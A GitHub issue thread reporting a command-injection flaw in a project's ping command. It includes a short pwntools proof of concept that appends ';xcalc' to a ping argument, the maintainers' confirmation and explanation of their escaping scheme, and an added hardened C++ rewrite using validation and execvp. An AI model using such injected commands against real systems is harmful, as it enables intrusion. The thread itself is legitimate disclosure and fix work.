Command Injection inside the ping command #3

Closed
CedMaire opened this issue May 13, 2019 · 1 comment

@CedMaire

Where:

FILE *pipe = popen(("cd " + usrLocation + " && " + string(cmdRedirection) + " 2>&1").c_str(),

They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.

Here is a PoC:

#!/usr/bin/env python
from pwn import *

# Connect the project's client binary to the server on localhost:1337
sh = process(['./client', '127.0.0.1', '1337'])

# sendline() appends the newline itself; the ';' ends the ping command
# so that the text after it is run as a second shell command
sh.sendline("ping google.ch;xcalc")
sh.interactive()
@KTiago
Collaborator

KTiago commented May 15, 2019

You are correct, there is indeed a vulnerability in the ping command and we certify that your exploit works. 🥇

However, let me make some clarifications:

While we have an escape function as you noticed, one of our programmers somehow forgot to call it for the ping command.

Moreover, this escape function only escapes quotes in a given string, which is an intended behavior. The idea is to put escaped user-supplied arguments of bash commands between quotes to prevent the execution of unintended additional commands. As an example, have a look at the cd command which does not suffer from the same vulnerability:

string cmd = "exec bash -c \'mkdir \"" + escape(absPath) + "\"\'";

The above prevents the use of ";" or "&&" or any other tricks to run a command injection.
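Added example, not code from this project or either participant: the issue shows the `popen()` pattern that hands concatenated user text to `/bin/sh`, where `;` separates commands. The snippet below contrasts that with a hardened version that first validates the argument against an allowlist (rejecting shell metacharacters and a leading `-`, which would otherwise be read as an option) and then runs the program directly through `fork()`/`execvp()` with an argv array, so no shell ever parses the user-supplied string. Function names, the allowlist, and the `echo` demonstration are assumptions made for this example.

```cpp
// Added example: vulnerable shell-string construction beside a shell-free,
// validated alternative. Not the project's code.
#include <cctype>
#include <cstdio>
#include <string>
#include <vector>
#include <sys/wait.h>
#include <unistd.h>

// Vulnerable pattern (mirrors the issue): user text is spliced into a command
// line that a shell will parse, so "google.ch;xcalc" becomes two commands.
std::string build_vulnerable_cmd(const std::string& user_host) {
    return "ping -c 1 " + user_host + " 2>&1";
}

// Allowlist for a hostname or IP literal: letters, digits, '.', '-', ':'.
// A leading '-' is rejected so the value cannot be taken as a ping option.
bool is_valid_host(const std::string& host) {
    if (host.empty() || host.size() > 253 || host[0] == '-') return false;
    for (unsigned char c : host) {
        if (!(std::isalnum(c) || c == '.' || c == '-' || c == ':')) return false;
    }
    return true;
}

// Run argv[0] directly (no shell) and capture its stdout+stderr into `out`.
// Returns the child's exit status, or -1 on a local failure.
int run_argv(const std::vector<std::string>& argv, std::string& out) {
    out.clear();
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        // Child: route stdout/stderr into the pipe, then exec without a shell.
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]); close(fds[1]);
        std::vector<char*> cargv;
        for (const auto& a : argv) cargv.push_back(const_cast<char*>(a.c_str()));
        cargv.push_back(nullptr);
        execvp(cargv[0], cargv.data());
        _exit(127);  // only reached if exec failed
    }
    close(fds[1]);
    char buf[256];
    ssize_t n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0) out.append(buf, n);
    close(fds[0]);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

// Hardened ping: validate first, then pass the host as its own argv entry.
// Returns false without running anything if validation fails.
bool safe_ping(const std::string& host, std::string& out) {
    if (!is_valid_host(host)) { out = "rejected: invalid host"; return false; }
    return run_argv({"ping", "-c", "1", host}, out) == 0;
}

int main() {
    std::string out;
    std::printf("vulnerable cmd: %s\n", build_vulnerable_cmd("google.ch;xcalc").c_str());
    std::printf("valid host? %d\n", (int)is_valid_host("google.ch;xcalc"));
    // The same string passed as a single argv entry stays literal: echo prints
    // it verbatim and nothing after the ';' is executed.
    run_argv({"echo", "google.ch;xcalc"}, out);
    std::printf("echo saw: %s", out.c_str());
    return 0;
}
```

The `echo` call stands in for `ping` so the demonstration runs offline; the point it makes is that an argv array carries `;`, `&&` and quotes as plain bytes, which is why avoiding the shell is a stronger fix than escaping individual characters inside a shell string.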
